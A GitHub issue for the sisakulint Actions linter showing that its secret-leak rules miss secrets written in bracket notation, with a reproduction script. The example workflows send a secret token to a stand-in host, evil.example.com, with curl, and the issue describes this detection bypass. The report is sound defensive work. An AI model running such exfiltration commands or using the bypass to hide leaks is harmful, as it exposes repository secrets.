### ISSUE TITLE
secret taint source is dot-notation only: `secrets['NAME']` silences secret-in-log and secret-exfiltration

### ISSUE THREAD

**Issue by on-keyday** [ultra-supara/sisakulint#602]
**TL;DR** — Both `secret-in-log` and `secret-exfiltration` build their taint source from the same
regular expression, which matches only `${{ secrets.NAME }}`. Writing the same secret as
`${{ secrets['NAME'] }}` — an equivalent expression in GitHub Actions — makes both rules go silent,
for log sinks and network sinks alike. `secret-exposure` still reports the bracket *spelling*, but
it does not follow the value, so a bracket-written secret reaching a sink is caught by no rule in
the family. The fix is to recognise bracket references as the same taint source.

### 1. The taint source is a dot-notation regex, in both rules

Evidence:

- `var secretEnvRefRe = regexp.MustCompile(`` `\$\{\{\s*secrets\.([A-Za-z_][A-Za-z0-9_]*)\s*\}\}` ``)` —
  [pkg/core/secretinlog.go#L65](https://github.com/sisaku-security/sisakulint/blob/dea1408b296a54edc30206ee844daf5ea185b79e/pkg/core/secretinlog.go#L65)
- the same expression again —
  [pkg/core/secretexfiltration.go#L663](https://github.com/sisaku-security/sisakulint/blob/dea1408b296a54edc30206ee844daf5ea185b79e/pkg/core/secretexfiltration.go#L663)

### 2. Changing only the spelling silences the log-sink rule

Same workflow twice, differing only in how the secret is written:

```yaml
      - run: echo "$TOKEN"
        env:
          TOKEN: ${{ secrets.MY_TOKEN }}      # -> secret-in-log
          # TOKEN: ${{ secrets['MY_TOKEN'] }} # -> secret-exposure only
```

At `dea1408b` (v0.3.6): the dot form reports `secret-in-log`; the bracket form reports only
`secret-exposure`.

### 3. The network sink behaves the same way

```yaml
      - run: curl -d "t=$TOKEN" https://evil.example.com/collect
        env:
          TOKEN: ${{ secrets.MY_TOKEN }}      # -> secret-exfiltration
          # TOKEN: ${{ secrets['MY_TOKEN'] }} # -> secret-exposure only
```

The dot form reports `secret-exfiltration`; the bracket form does not.

### 4. The rule that does see the bracket form does not follow the value

`secret-exposure` reports `secrets[...]` as a spelling to change. That is a finding about the
expression, not about the leak — it fires identically whether or not the value reaches a sink. So
for the case in 2 and 3, no rule in the family reports the leak.

**Recommended change:** treat a bracket reference as the same taint source as the dot form. Parsing
the expression rather than matching its spelling closes the neighbouring variants too (whitespace,
double vs single quotes). If that is too large a change here, adding the bracket form to the
pattern restores detection for the common case, at the cost of the next spelling doing the same
thing.

Worth noting for the fix's framing: `secret-exposure`'s own remediation advice is to rewrite
bracket into dot notation, and following that advice is exactly what makes the other two rules
start working again. The public page gives "easier to analyse" as the reason but does not say that
analysis is what currently depends on it.

## Scope & limitations

- We read the two taint-source sites and reproduced the effect end to end. We did not read
  `pkg/shell` or `workflow_secret_taint.go`; the claim is that the source is never created, so
  propagation downstream of it does not get a chance to matter.
- We did not check whether some other path constructs a taint source that does pick up the bracket
  form. If one exists, the "no rule in the family sees it" conclusion narrows.
- This is about source recognition, which is upstream of the intra-script taint work in #445; we do
  not think that epic covers it, but you will know better whether the planned AST migration would
  subsume this.

## Reproduction

Tool pinned at `dea1408b296a54edc30206ee844daf5ea185b79e` (v0.3.6):

```bash
git clone https://github.com/sisaku-security/sisakulint && cd sisakulint
git checkout dea1408b296a54edc30206ee844daf5ea185b79e && go build -o sisakulint ./cmd/sisakulint
SL=$PWD/sisakulint
mkdir -p /tmp/p/.github/workflows && git -C /tmp/p init -q

mk() {  # $1 file, $2 secret expression, $3 run line
  cat > /tmp/p/.github/workflows/$1 <<YML
name: T
on:
  push:
    branches: [main]
permissions: {}
jobs:
  j:
    runs-on: ubuntu-latest
    timeout-minutes: 5
    steps:
      - run: $3
        timeout-minutes: 1
        env:
          TOKEN: $2
YML
}
ids() { (cd /tmp/p && "$SL" .github/workflows/$1 2>/dev/null) | grep -oE '\[[a-z-]+\]$' | sort -u; }

mk dot.yml '${{ secrets.MY_TOKEN }}'      'echo "$TOKEN"'
mk brk.yml "\${{ secrets['MY_TOKEN'] }}"  'echo "$TOKEN"'
ids dot.yml   # [secret-in-log]
ids brk.yml   # [secret-exposure]

mk xdot.yml '${{ secrets.MY_TOKEN }}'     'curl -d "t=$TOKEN" https://evil.example.com/collect'
mk xbrk.yml "\${{ secrets['MY_TOKEN'] }}" 'curl -d "t=$TOKEN" https://evil.example.com/collect'
ids xdot.yml  # [secret-exfiltration]
ids xbrk.yml  # [secret-exposure]
```

## Status

Draft recommendation from an internal review; it has not been accepted internally yet. Finding 1 is
a quote from the pinned source; 2 through 4 are from the reproduction above.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
